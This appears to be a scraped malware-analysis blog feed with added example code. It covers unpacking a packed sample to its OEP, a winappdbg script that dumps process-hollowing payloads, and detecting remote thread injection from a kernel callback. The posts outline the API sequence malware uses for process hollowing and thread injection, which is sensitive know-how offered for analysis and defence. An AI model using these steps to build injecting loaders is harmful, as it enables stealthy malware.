Place a breakpoint on ExitProcess().<br />
Press F9 to execute. Allow the sample to execute till it hits ExitProcess
so that it unpacks. You can check the memory strings in Process Explorer to see
<br />
if the sample has unpacked. You would see a difference in static <br />
<b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKrqliIdAsk1zjRYfJdTRxQYYmfC30UFdmHw0B1aINyQ3pKzn8M_GiUwO1Zf23ETca2_yEGogymS58kPxCu-8neMJuduMzkS6iP4E4SlDcmo4UaRfifzkmLwj9gwVe5GKlg5B_e4T_EmgQ/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="259" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKrqliIdAsk1zjRYfJdTRxQYYmfC30UFdmHw0B1aINyQ3pKzn8M_GiUwO1Zf23ETca2_yEGogymS58kPxCu-8neMJuduMzkS6iP4E4SlDcmo4UaRfifzkmLwj9gwVe5GKlg5B_e4T_EmgQ/s320/2.png" width="320" /></a></div>
</b><br />
<br />
Fig: memory strings in Process Explorer<br />
<br />
Now dump the header from memory. I have used Process Hacker for the purpose.
Other tools can also be used.<br />
<b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdrojP92v9uHt84MOxoH37Xs1IvMSu8NSUWAgzxHYIuQs5F7GpJwTQ-IDA4-pBEvbXfLHEX0uSQypM2lgodKZXaiYvajfwJVFm0bwBu13Obs9gkip7-qvEOFU4TuUQbfRu7TP-F1KW3VDG/s1600/3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdrojP92v9uHt84MOxoH37Xs1IvMSu8NSUWAgzxHYIuQs5F7GpJwTQ-IDA4-pBEvbXfLHEX0uSQypM2lgodKZXaiYvajfwJVFm0bwBu13Obs9gkip7-qvEOFU4TuUQbfRu7TP-F1KW3VDG/s320/3.png" width="320" /></a></div>
</b><br />
<br />
<br />
Fig: Process Hacker dumps the header from memory<br />
<br />
Now look at the entry point in the dumped header.<br />
<b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCZiSsVkZwCkNuK5GhylLy-Uc51iZolYNYS-GbMa3aQC2ZWbYbmFC2r5mBgmlPTAVN1a2yG3fpg1x0IBXJ40F9FxF56rs8wS3XCx-qizI4DX2TSLYiYX9sHmKty6SqOp5rXtDcsA7r763k/s1600/4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCZiSsVkZwCkNuK5GhylLy-Uc51iZolYNYS-GbMa3aQC2ZWbYbmFC2r5mBgmlPTAVN1a2yG3fpg1x0IBXJ40F9FxF56rs8wS3XCx-qizI4DX2TSLYiYX9sHmKty6SqOp5rXtDcsA7r763k/s320/4.png" width="320" /></a></div>
</b><br />
<br />
Fig: dumped header, EP 0x4C00<br />
<br />
The image base of the process when loaded in Olly is 0x400000.<br />
Restart OllyDbg and set a hardware breakpoint on execute at 0x404C00 (image
base + RVA of the EP in the unpacked header: 0x400000 + 0x4C00).<br />
<b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgODc8Lp3SmSvWTrM98kulmBCV5_wbt7IFDEsEb5H1tCeVUc846UBSzwU1-5kqjcnry_gIYNYbilCKEl7_vfpe5dahtAOvqFH8dOAmgniQEsux1iXKN4ukGeTH_8ciM7PawrEgnjLHK5dGD/s1600/5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgODc8Lp3SmSvWTrM98kulmBCV5_wbt7IFDEsEb5H1tCeVUc846UBSzwU1-5kqjcnry_gIYNYbilCKEl7_vfpe5dahtAOvqFH8dOAmgniQEsux1iXKN4ukGeTH_8ciM7PawrEgnjLHK5dGD/s320/5.png" width="320" /></a></div>
</b><br />
Fig: OllyDbg, hardware breakpoint set on the expected OEP<br />
<br />
Now press F9 to execute. <br />
Bam! You land on the actual OEP, and you can see meaningful code at that point.<br />
<b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-qeOYuIwRts-Q1IWbE3VFJysppc1A2uaXtRYXzh84cN0p9dhh0N8rguPLj-mRCl_iaxe2MuQ-e-1cmsakAscG4g_96kPtJZNOD_F7Vrwi6GFIFMdI2RtoR9yPoa5txGotjrCkBM3S-K9b/s1600/6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-qeOYuIwRts-Q1IWbE3VFJysppc1A2uaXtRYXzh84cN0p9dhh0N8rguPLj-mRCl_iaxe2MuQ-e-1cmsakAscG4g_96kPtJZNOD_F7Vrwi6GFIFMdI2RtoR9yPoa5txGotjrCkBM3S-K9b/s320/6.png" width="320" /></a></div>
</b><br />
Fig: OllyDbg breaks at the OEP<br />
<br />
Now you can dump the unpacked file and analyse it. OllyDumpEx is one of the best
options to dump the unpacked process; you need not fix imports if you do that.<br />
Hope this helps.</div>
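<p>As an added example (my code, not from this blog or from any of the tools mentioned), the following Python script parses the headers the posts above inspect by hand: the MZ signature and the 32-bit versus 64-bit check from the static analysis step in the Malware Analysis post, and the entry point RVA plus image base computation used above to locate the OEP (0x400000 + 0x4C00 = 0x404C00). It works on the first bytes of a file on disk or on a header dumped from memory with Process Hacker. The sample header bytes are constructed inside the script and are not taken from the sample analysed above; the helper names are mine.</p>

```python
import struct

# Machine values from the PE/COFF specification.
MACHINE_NAMES = {
    0x014C: "x86 (32-bit)",
    0x8664: "x64 (64-bit)",
    0x01C4: "ARM Thumb-2",
    0xAA64: "ARM64",
}
PE32_MAGIC = 0x10B       # optional header magic for 32-bit images
PE32PLUS_MAGIC = 0x20B   # optional header magic for 64-bit images
IMAGE_FILE_DLL = 0x2000  # Characteristics flag


def parse_pe_header(data):
    """Parse the DOS, COFF and optional headers of a PE image.

    Works on the first bytes of a file on disk or on a header dumped from
    process memory. Returns a dict of the facts an analyst checks first,
    or raises ValueError if the bytes do not look like a Windows PE.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ signature: not a Windows executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")

    coff = e_lfanew + 4
    (machine, nsections, _timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff)

    opt = coff + 20
    if opt_size < 32 or opt + opt_size > len(data):
        raise ValueError("optional header missing or truncated")
    magic = struct.unpack_from("<H", data, opt)[0]
    # AddressOfEntryPoint sits at offset 16 in both layouts; ImageBase is a
    # 4-byte field at offset 28 in PE32 and an 8-byte field at offset 24 in PE32+.
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == PE32_MAGIC:
        bits = 32
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == PE32PLUS_MAGIC:
        bits = 64
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)

    return {
        "machine": MACHINE_NAMES.get(machine, "unknown (0x%04x)" % machine),
        "bits": bits,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "sections": nsections,
        "entry_rva": entry_rva,
        "image_base": image_base,
        # Where the hardware breakpoint on execute goes once the unpacking stub
        # has rewritten the header: image base + RVA of the entry point.
        "entry_va": image_base + entry_rva,
    }


def analysis_vm_for(info):
    """Pick the dynamic-analysis environment, as the static step in the post does."""
    return "64-bit Windows" if info["bits"] == 64 else "32-bit or 64-bit Windows"


def build_sample_header(bits=32, entry_rva=0x4C00, image_base=0x400000):
    """Constructed header bytes for offline testing; this is not a real binary.

    The defaults reproduce the values from the unpacking post (EP RVA 0x4C00,
    image base 0x400000), so the computed OEP is 0x404C00.
    """
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header right after the DOS header
    if bits == 32:
        machine, magic, opt_size = 0x014C, PE32_MAGIC, 96
    else:
        machine, magic, opt_size = 0x8664, PE32PLUS_MAGIC, 112
    # Characteristics: EXECUTABLE_IMAGE (0x0002), plus 32BIT_MACHINE (0x0100) for x86
    characteristics = 0x0002 | (0x0100 if bits == 32 else 0)
    coff = struct.pack("<HHIIIHH", machine, 3, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<I", opt, 16, entry_rva)
    if bits == 32:
        struct.pack_into("<I", opt, 28, image_base)
    else:
        struct.pack_into("<Q", opt, 24, image_base)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for sample in (build_sample_header(32), build_sample_header(64, image_base=0x140000000)):
        info = parse_pe_header(sample)
        print("%s, %d sections, entry RVA 0x%x, image base 0x%x -> OEP VA 0x%x; analyse on %s"
              % (info["machine"], info["sections"], info["entry_rva"], info["image_base"],
                 info["entry_va"], analysis_vm_for(info)))
```

To use it on a real sample, pass the first few hundred bytes of the file (or of the header dumped from memory) to parse_pe_header; the entry_va it reports is the address to put the hardware breakpoint on, assuming the image is loaded at its preferred base as it was above.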
abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com3tag:blogger.com,1999:blog-9205939188428310956.post-18071234104836461462014-10-04T06:09:00.001-07:002014-10-04T06:12:43.915-07:00Dynamic Automatic Unpacking for RunPE,Process Hollowing Malware(winappdbg)<p>The code shows simple usage of winappdbg. The same idea can be implemented in other debuggers, such as PyDbg.</p> <p>Process Hollowing, RunPE and Process Forking are more or less different terms for the same technique. In this method a malware creates a process in suspended mode, injects the decrypted PE into the suspended process and then executes it.</p> <p>There are a lot of POCs for process hollowing on the internet.</p> <p>One of the methods is as follows:</p> <p>1) Process created in suspended mode</p> <p>2) Call to GetThreadContext</p> <p>3) Call VirtualAlloc and copy the unpacked PE to it</p> <p>4) Call WriteProcessMemory to write the decrypted PE into the suspended process</p> <p>5) Call SetThreadContext</p> <p>6) Call to ResumeThread</p> <p>My objective is to dump the unpacked PE from step 3 to disk.</p> <p>Following is the code. This is just crude code; I have not done any sort of validation and error checking here. I have used some code available on the internet. Feel free to modify the code.</p> <p><strong>NOTE:</strong> This won't work for all types of process hollowing.</p> <p><strong>CODE:</strong></p> <div class="csharpcode"><pre>
# Please pass the absolute path of the file to be unpacked.
# Dumps the buffer that a process-hollowing loader hands to WriteProcessMemory.
from __future__ import print_function
from winappdbg import Debug, EventHandler, Process

DUMP_PATH = "C:/unpacked.bin"


def process_read(pid, address, length):
    # Read the process memory.
    process = Process(pid)
    return process.read(address, length)


def action_WriteProcessMemoryW(event):
    # Stack at the breakpoint: [0] return address, [1] hProcess,
    # [2] lpBaseAddress, [3] lpBuffer, [4] nSize, [5] lpNumberOfBytesWritten.
    # lpBuffer (the third argument) points at the decrypted PE in the loader's own memory.
    pid = event.get_pid()
    bufferAddr = event.get_thread().read_stack_dwords(6)[3]
    print("WriteProcessMemory buffer at", hex(bufferAddr))

    process = Process(pid)
    # Find the region (as allocated by VirtualAlloc) that starts at the buffer and dump it whole.
    for mbi in process.get_memory_map():
        if mbi.BaseAddress == bufferAddr:
            print("dumping data from", hex(mbi.BaseAddress), "size", hex(mbi.RegionSize))
            data = process_read(pid, mbi.BaseAddress, mbi.RegionSize)
            with open(DUMP_PATH, "wb") as fo:   # binary mode, so 0x0A bytes are not translated
                fo.write(data)
            break


def action_CreateProcessW(event):
    # Called when the loader creates the (suspended) target process; only logged here.
    print("CreateProcessW called from pid", event.get_pid(), "tid", event.get_tid())


class MyEventHandler(EventHandler):

    def load_dll(self, event):
        # Get the new module object
        module = event.get_module()
        # If it's kernel32.dll...
        if module.match_name("kernel32.dll"):
            pid = event.get_pid()
            # Resolve the APIs used by the hollowing loader
            address = module.resolve("CreateProcessW")
            addressWPW = module.resolve("WriteProcessMemory")
            # Set breakpoints on them
            event.debug.break_at(pid, address, action_CreateProcessW)
            event.debug.stalk_at(pid, addressWPW, action_WriteProcessMemoryW)


def simple_debugger(argv):
    # Instance a Debug object, passing it the MyEventHandler instance
    debug = Debug(MyEventHandler())
    try:
        debug.execv(argv)
        debug.loop()
    finally:
        # Stop the debugger
        debug.stop()


# When invoked from the command line, the first argument is the executable
# that needs to be unpacked (please provide the absolute path); the remaining
# arguments are passed to the newly created process.
if __name__ == "__main__":
    import sys
    simple_debugger(sys.argv[1:])
</pre></div> abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com3tag:blogger.com,1999:blog-9205939188428310956.post-13938768930928026312014-06-25T03:53:00.001-07:002014-06-25T04:02:11.255-07:00Monitoring Thread Injection<div dir="ltr" style="text-align: left;" trbidi="on">
A lot of malware injects threads into other processes to bypass security products. <br />
Usually the malware writes its shellcode into the remote process using WriteProcessMemory() and then starts a thread in that process using CreateRemoteThread(). A lot of source code for this is available on the internet. <br />
Let’s see how we can monitor thread injection using a kernel mode driver. A lot of AV products use this method, so I won’t get into much detail. <br />
Windows has an API, PsSetCreateThreadNotifyRoutine, that can be used by kernel mode drivers. It registers a callback function that is invoked whenever a thread is created. <br />
Please refer to MSDN for further details. <br />
It can be used as follows: <br />
PsSetCreateThreadNotifyRoutine(RemoteThreadDetect); // registers the notification routine <br />
Now a part of the RemoteThreadDetect routine: <br />
VOID RemoteThreadDetect (IN HANDLE RemotePid, IN HANDLE ThreadId, IN BOOLEAN flag) <br />
{ <br />
…………….. <br />
……….<br />
currproc = PsGetCurrentProcessId(); // gets the current process ID <br />
………………. <br />
if (currproc != RemotePid) // check whether the current pid and the pid passed to the function are the same<br />
{<br />
DbgPrint("thread injection detected");<br />
} <br />
………… <br />
} <br />
PsGetCurrentProcessId() gets the ID of the process in whose context the thread creation is being called, while RemotePid is the process that receives the new thread. <br />
The logic is really simple: if currproc and RemotePid are not the same, the thread is being created from another process, which means it has been injected. <br />
I am not publishing the code as it’s too easy, and similar code can be found on the internet. <br />
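The decision the callback makes, as an added example that is not the post's driver: a user-mode C model of the RemoteThreadDetect logic that compiles and runs on any host. It stands in for the kernel HANDLE values with plain integers, replays a constructed sequence of notifications (pids are made up), and adds the two checks a driver needs around the pid comparison: ignoring exit notifications (the Create flag is FALSE) and ignoring a parent process creating a new process's first thread, which the bare comparison would otherwise report as an injection.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* One thread notification as a PCREATE_THREAD_NOTIFY_ROUTINE receives it:
 * the process getting the thread, the new thread id, and Create (TRUE on
 * creation, FALSE on exit). currentPid stands in for what
 * PsGetCurrentProcessId() returns inside the callback, which runs in the
 * context of the thread that is doing the creating. */
typedef struct {
    uintptr_t targetPid;   /* RemotePid in the post */
    uintptr_t threadId;
    bool      create;      /* the BOOLEAN flag in the post */
    uintptr_t currentPid;  /* PsGetCurrentProcessId() */
} ThreadNotify;

/* Processes whose first thread has not been seen yet. The initial thread of
 * a new process is created by its parent, so targetPid != currentPid for
 * every process launch; without this filter each launch would be flagged.
 * A driver would feed this from a process-creation callback
 * (PsSetCreateProcessNotifyRoutine); the model uses a small fixed array
 * and assumes the process notification arrives before the thread one. */
#define MAX_PENDING 64
static uintptr_t g_pending[MAX_PENDING];
static size_t    g_pendingCount;

void OnProcessCreated(uintptr_t pid)
{
    if (g_pendingCount < MAX_PENDING)
        g_pending[g_pendingCount++] = pid;
}

/* True (and the pid is forgotten) if this is the first thread of a process
 * we saw being created. */
static bool ConsumeFirstThread(uintptr_t pid)
{
    for (size_t i = 0; i < g_pendingCount; i++) {
        if (g_pending[i] == pid) {
            g_pending[i] = g_pending[--g_pendingCount];
            return true;
        }
    }
    return false;
}

/* The comparison from the post's RemoteThreadDetect, with the extra checks
 * a driver needs. Returns true when the thread is created by a process
 * other than the one receiving it. */
bool RemoteThreadDetect(const ThreadNotify *n)
{
    if (!n->create)
        return false;                   /* thread exit, not a creation */
    if (n->currentPid == n->targetPid)
        return false;                   /* a process creating its own thread */
    if (ConsumeFirstThread(n->targetPid))
        return false;                   /* parent starting the child's first thread */
    return true;                        /* cross-process thread creation */
}

/* Replays a constructed notification sequence and returns the number of
 * injections flagged. */
size_t ReplaySampleEvents(void)
{
    g_pendingCount = 0;
    OnProcessCreated(0x594);            /* parent 0x56c launches process 0x594 */
    const ThreadNotify events[] = {
        { 0x594, 0x598, true,  0x56c }, /* first thread, created by the parent */
        { 0x594, 0x5a0, true,  0x594 }, /* 0x594 creates a worker thread of its own */
        { 0x594, 0x7f0, true,  0x330 }, /* 0x330 creates a thread inside 0x594 */
        { 0x594, 0x7f0, false, 0x594 }, /* that thread exits */
    };
    size_t flagged = 0;
    for (size_t i = 0; i < sizeof events / sizeof events[0]; i++) {
        if (RemoteThreadDetect(&events[i])) {
            printf("thread injection detected: pid 0x%lx created thread 0x%lx in pid 0x%lx\n",
                   (unsigned long)events[i].currentPid,
                   (unsigned long)events[i].threadId,
                   (unsigned long)events[i].targetPid);
            flagged++;
        }
    }
    return flagged;   /* 1 for the sequence above */
}

int main(void)
{
    return ReplaySampleEvents() == 1 ? 0 : 1;
}
```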
<br />
<div class="wlWriterEditableSmartContent" id="scid:fb3a1972-4489-4e52-abe7-25a00bb07fdf:69be029d-7943-4b38-ba36-b63777433899" style="display: inline; float: none; margin: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI6DbRzKt-c1lDp8GXu6x39quR-WNS5SBpfxEfUyNNdDiXNfPurptdZJk-Pf4bQ7cIZFwbUPVoAS6IVWT3pVEJ6rOBnOy1xdA45W7DAAdofWx9CnIg7VqltuuwW3PweagLJT3P-PRI5RsA/s1600-h/image%25255B7%25255D.png"><img alt="image" border="0" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfJ4Js-A2adegsOvCTrzzF3zYU-DWUZ-ed7767LX0pmudR9LzUf-gnlLzSNGsjCsAFNfooSA1P8IWQ0fUSA61b9RC066IOtNd9ppejfLSJZ-4nsDqHkPsYsU2q44BNFZ-a_2YKPwo_o0mY//?imgmax=800" title="image" width="530" /></a></div>
<br /></div>
abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com1tag:blogger.com,1999:blog-9205939188428310956.post-34060528531542391342012-04-17T03:02:00.001-07:002012-04-17T03:06:02.276-07:00Identifying malicious injected code in Legit Process through dynamic analysis:<p>I won’t be diving into the details of how thread injection is done, as there is a lot of information on the internet about it.</p> <p>To locate malicious code injected into a process I will be using the Sysinternals VMMap tool and WinDbg as a remote debugger. 
</p> <p>I’ll show how to identify injected threads in explorer.exe. </p> <p>Using WinDbg, I first list the processes running on the system.</p> <p>Command: !process 0 0 </p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 536px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 157px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">kd> !process 0 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">**** NT ACTIVE PROCESS DUMP ****<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 829c6830 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 00319000 ObjectTable: e1000cc0 HandleCount: 475.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: System<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 82879170 SessionId: none Cid: 0238 Peb: 7ffd6000 ParentCid: 0004<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040020 ObjectTable: e1793dc0 HandleCount: 21.<br /></pre><pre 
style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: smss.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 822dc360 SessionId: 0 Cid: 0268 Peb: 7ffdf000 ParentCid: 0238<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040040 ObjectTable: e165c858 HandleCount: 395.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: csrss.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 827e1020 SessionId: 0 Cid: 0280 Peb: 7ffde000 ParentCid: 0238<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040060 ObjectTable: e1649b20 HandleCount: 564.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: winlogon.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 827e6020 SessionId: 0 Cid: 02ac Peb: 7ffda000 ParentCid: 0280<br /></pre><pre 
style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040080 ObjectTable: e188d650 HandleCount: 270.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: services.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 824571c8 SessionId: 0 Cid: 02b8 Peb: 7ffdd000 ParentCid: 0280<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080400a0 ObjectTable: e1894188 HandleCount: 342.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: lsass.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 8254fca8 SessionId: 0 Cid: 036c Peb: 7ffd4000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080400c0 ObjectTable: e197a418 HandleCount: 24.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: vmacthlp.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre 
style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 82453da0 SessionId: 0 Cid: 0378 Peb: 7ffd9000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080400e0 ObjectTable: e197e3d8 HandleCount: 189.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: svchost.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 823ef810 SessionId: 0 Cid: 03e8 Peb: 7ffdf000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040120 ObjectTable: e1cca130 HandleCount: 283.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: svchost.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 8245a7e8 SessionId: 0 Cid: 0448 Peb: 7ffde000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040140 ObjectTable: e1ccb818 HandleCount: 1520.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
New',courier,monospace; background-color: #fbfbfb"> Image: svchost.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 8273b7e0 SessionId: 0 Cid: 0498 Peb: 7ffdd000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040160 ObjectTable: e17b3310 HandleCount: 79.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: svchost.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 8255d460 SessionId: 0 Cid: 0580 Peb: 7ffde000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080401a0 ObjectTable: e1898440 HandleCount: 210.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: svchost.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 827f9020 SessionId: 0 Cid: 0594 Peb: 7ffda000 ParentCid: 056c<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
New',courier,monospace; background-color: #ffffff"> DirBase: 080401c0 ObjectTable: e1893ed8 HandleCount: 817.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 82452980 SessionId: 0 Cid: 0634 Peb: 7ffdf000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080401e0 ObjectTable: e1fb64f8 HandleCount: 134.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: spoolsv.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 823e8b88 SessionId: 0 Cid: 06dc Peb: 7ffd7000 